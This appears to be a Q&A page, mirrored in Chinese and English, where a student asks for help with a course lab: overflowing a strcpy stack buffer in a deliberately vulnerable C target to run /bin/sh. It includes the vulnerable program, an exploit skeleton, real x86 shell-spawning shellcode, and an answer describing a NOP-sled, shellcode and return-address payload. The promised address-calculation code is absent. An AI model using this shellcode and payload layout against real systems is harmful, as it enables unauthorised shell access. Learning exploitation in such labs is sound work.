故意缓冲区溢出利用程序
我正在尝试为我的一门计算机科学课程解决这个问题,我已经利用了所有资源,但仍然存在问题,如果有人可以提供一些见解,我将不胜感激。
我有这个“目标”,我需要使用缓冲区溢出漏洞来执行 execve(“/bin/sh”)。在 buf[128] 溢出中,当执行不安全命令 strcpy 时,系统期望找到返回地址的位置出现了一个返回缓冲区的指针。
target.cexploit.cshellcode.h
int bar(char *arg, char *out)
{
strcpy(out,arg);
return 0;
}
int foo(char *argv[])
{
char buf[128];
bar(argv[1], buf);
}
int main(int argc, char *argv[])
{
if (argc != 2)
{
fprintf(stderr, "target: argc != 2");
exit(EXIT_FAILURE);
}
foo(argv);
return 0;
}
sh
#include "shellcode.h"
#define TARGET "/tmp/target1"
int main(void)
{
char *args[3];
char *env[1];
args[0] = TARGET; args[1] = "hi there"; args[2] = NULL;
env[0] = NULL;
if (0 > execve(TARGET, args, env))
fprintf(stderr, "execve failed.\n");
return 0;
}
我知道我需要用超过 128 个字节填充 argv[1],超过 128个
static char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
字节是返回地址,它应该指向缓冲区,以便它在其中执行 /bin/ 。到目前为止这是正确的吗?有人可以提供下一步吗?
非常感谢您的帮助。
I'm trying to figure out this problem for one of my comp sci classes, I've utilized every resource and still having issues, if someone could provide some insight, I'd greatly appreciate it.
I have this "target" I need to execute a execve(“/bin/sh”) with the buffer overflow exploit. In the overflow of buf[128], when executing the unsafe command strcpy, a pointer back into the buffer appears in the location where the system expects to find return address.
target.c
int bar(char *arg, char *out)
{
strcpy(out,arg);
return 0;
}
int foo(char *argv[])
{
char buf[128];
bar(argv[1], buf);
}
int main(int argc, char *argv[])
{
if (argc != 2)
{
fprintf(stderr, "target: argc != 2");
exit(EXIT_FAILURE);
}
foo(argv);
return 0;
}
exploit.c
#include "shellcode.h"
#define TARGET "/tmp/target1"
int main(void)
{
char *args[3];
char *env[1];
args[0] = TARGET; args[1] = "hi there"; args[2] = NULL;
env[0] = NULL;
if (0 > execve(TARGET, args, env))
fprintf(stderr, "execve failed.\n");
return 0;
}
shellcode.h
static char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
I understand I need to fill argv[1] with over 128 bytes, the bytes over 128 being the return address, which should be pointed back to the buffer so it executes the /bin/sh within. Is that correct thus far? Can someone provide the next step?
Thanks very much for any help.
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(1)
好吧,所以你希望程序执行你的 shellcode。它已经是机器形式了,因此可以由系统执行。您已将其存储在缓冲区中。所以,问题是“系统如何知道执行我的代码?”更准确地说,“系统如何知道在哪里寻找下一个要执行的代码?”在这种情况下,答案是您正在谈论的返回地址。
基本上,你走在正确的轨道上。您是否尝试过执行代码?在执行此类漏洞利用时我注意到的一件事是,它不是一门精确的科学。有时,内存中还有其他您不希望出现的内容,因此您必须增加添加到缓冲区中的字节数,以便将返回地址与系统期望的位置正确对齐。
我不是安全专家,但我可以告诉您一些可能有帮助的事情。一个是我通常包含一个“NOP Sled” - 本质上只是一系列 0x90 字节,除了在处理器上执行“NOP”指令之外不执行任何操作。另一个技巧是在缓冲区末尾重复返回地址,这样即使其中一个覆盖了堆栈上的返回地址,您也将成功返回到您想要的位置。
因此,您的缓冲区将如下所示:
| NOP 雪橇 |外壳代码 |重复退货地址 |
(注:这些不是我的想法,我是从 Jon Erickson 的《黑客:剥削的艺术》中得到的。如果您有兴趣了解更多相关内容,我推荐这本书)。
要计算地址,您可以使用类似于以下内容的内容:
现在,ret 将保存您想要返回的返回地址,假设您将缓冲区分配在堆上。
Well, so you want the program to execute your shellcode. It's already in machine form, so it's ready to be executed by the system. You've stored it in a buffer. So, the question would be "How does the system know to execute my code?" More precisely, "How does the system know where to look for the next code to be executed?" The answer in this case is the return address you're talking about.
Basically, you're on the right track. Have you tried executing the code? One thing I've noticed when performing this type of exploit is that it's not an exact science. Sometimes, there are other things in memory that you don't expect to be there, so you have to increase the number of bytes you add into your buffer in order to correctly align the return address with where the system expects it to be.
I'm not a specialist in security, but I can tell you a few things that might help. One is that I usually include a 'NOP Sled' - essentially just a series of 0x90 bytes that don't do anything other than execute 'NOP' instructions on the processor. Another trick is to repeat the return address at the end of the buffer, so that if even one of them overwrites the return address on the stack, you'll have a successful return to where you want.
So, your buffer will look like this:
| NOP SLED | SHELLCODE | REPEATED RETURN ADDRESS |
(Note: These aren't my ideas, I got them from Hacking: The Art of Exploitation, by Jon Erickson. I recommend this book if you're interested in learning more about this).
To calculate the address, you can use something similar to the following:
Now, ret will hold the return address you want to return to, assuming that you allocate buffer to be on the heap.